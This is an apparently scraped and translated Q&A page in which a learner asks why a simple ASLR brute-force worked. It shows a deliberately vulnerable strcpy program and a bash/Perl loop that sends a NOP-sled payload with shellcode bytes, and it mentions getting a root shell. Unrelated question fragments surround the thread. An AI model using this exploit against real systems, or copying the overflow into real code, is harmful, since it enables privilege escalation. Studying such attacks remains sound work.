- c - 在位数组中找到第一个零
- linux - Unix 显示有关匹配两种模式之一的文件的信息
- 正则表达式替换多个文件
- linux - 隐藏来自 xtrace 的命令
我刚读到地址空间布局随机化,我尝试了一个非常简单的脚本来尝试暴力破解它。这是我用来测试一些东西的程序。
#include <stdio.h>
#include <string.h>
int main (int argc, char **argv)
{
char buf[8];
printf("&buf = %p\n", buf);
if (argc > 1 && strcpy(buf, argv[1]));
return 0;
}
我用这个命令编译它:
gcc -g -fno-stack-protector -o vul vul.c
我确保启用了 ASLR:
$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
然后,我想到了这个简单的脚本:
str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
. "\x90"x65536 \
. "\x31\xc0\x40\x89\xc3\xcd\x80"'`
while [ $? -ne 1 ]; do
./vul $str
done
格式为
return address many times | 64KB NOP slide | shellcode that runs exit(1)
在运行此脚本几秒钟后,它按我的意愿退出并显示错误代码 1。我还尝试了其他调用 execv("/bin/sh", ...) 的 shellcode,我也成功了。
我觉得很奇怪,即使在返回地址之后也可以创建这么长的 NOP 幻灯片。我认为 ASLR 更有效,我错过了什么吗?是地址空间太小了吗?
编辑:我做了一些额外的研究,这是我的发现:
我请一位 friend 在他的 64b 计算机上使用 -m32 -z execstack
运行此代码,稍微更改返回地址后,他得到了相同的结果。
即使我没有使用-z execstack
,我还是设法执行了shellcode。我通过使用不同的 shellcode 来确保这一点,这些 shellcode 都做了他们应该做的事情(即使是众所周知的场景 chown root ./vul
,chmod +s ./vul
, shellcode 运行 setreuid(0, 0)
然后 execv("/bin/sh", ...)
最后 whoami
返回生成的外壳中的“root”)。这很奇怪,因为 execstack -q ./vul
告诉我可执行堆栈标志位未设置。有谁知道为什么?
最佳答案
首先,我有点惊讶您不需要将选项 -z execstack
传递给编译器来获取 shellcode 来执行 exit(1)
。
此外,我猜您使用的是 32 位机器,因为您没有将选项 -m32
传递给 gcc
以获得 32 位代码。
最后,我确实运行了你的程序但没有成功(我等了不止几秒钟)。
所以,我对你的结论有点怀疑(除非你运行的是一个非常特殊的 Linux 系统或者可能很幸运)。
无论如何,有两件事你没有提到:
您可以查看 ASLR 维基百科页面上的“ASLR Effectiveness”部分。
关于c - ASLR暴力破解,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/16110591/
用户将输入重量阈值、物体数量以及 3 个物体的重量和成本。输出应该是背包图,并且应该显示最优解。 重量应该最大,成本应该最小。 示例输出: w=60 n=3 w = 10 w2 = 35 w3 = 3
所以我在学习 Python 的同时从“Violent Python”开始黑客攻击,我遇到了一个问题这是我的代码: import optparse import socket from socket i
我是一名优秀的程序员,十分优秀!